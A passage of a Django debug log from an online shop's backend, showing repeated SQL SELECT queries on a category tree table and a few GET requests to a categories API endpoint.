"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:15:14,947 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:15:14,951 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:15:14,953 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:15:14,956 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:15:14,958 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:15:14,961 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:15:14,965 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:15:14,967 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:15:14,970 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:15:14,974 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:15:14,980 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:15:14,987 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:15:14,991 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:15:14,995 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:15:14,999 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:15:15,005 utils 2749 140297222735616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:15:15,009 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:15:15,014 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:15:15,018 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:15:15,022 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:15:15,027 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:15:15,031 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:15:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 21:15:30,331 utils 2749 140297222735616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-31 21:15:30,336 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:15:30,340 utils 2749 140297212245760 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() [31/Dec/2019 21:15:30] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-31 21:15:30,346 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:15:30,350 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:15:30,353 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:15:30,357 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:15:30,359 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:15:30,362 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:15:30,367 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:15:30,371 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:15:30,377 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:15:30,381 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:15:30,385 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:15:30,389 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:15:30,393 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:15:30,399 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:15:30,403 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:15:30,407 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:15:30,410 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:15:30,414 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:15:30,418 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:15:30,421 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:15:30,425 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:15:30,433 utils 2749 140297212245760 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:15:30,437 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:15:30,441 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:15:30,449 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:15:30,453 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:15:30,457 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:15:30,461 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:15:30,464 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:15:30,468 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:15:30,472 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:15:30,476 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:15:30,480 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:15:30,484 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:15:30,490 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:15:30,492 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:15:30,494 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:15:30,497 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:15:30,499 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:15:30,502 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:15:30,505 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:15:30,507 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 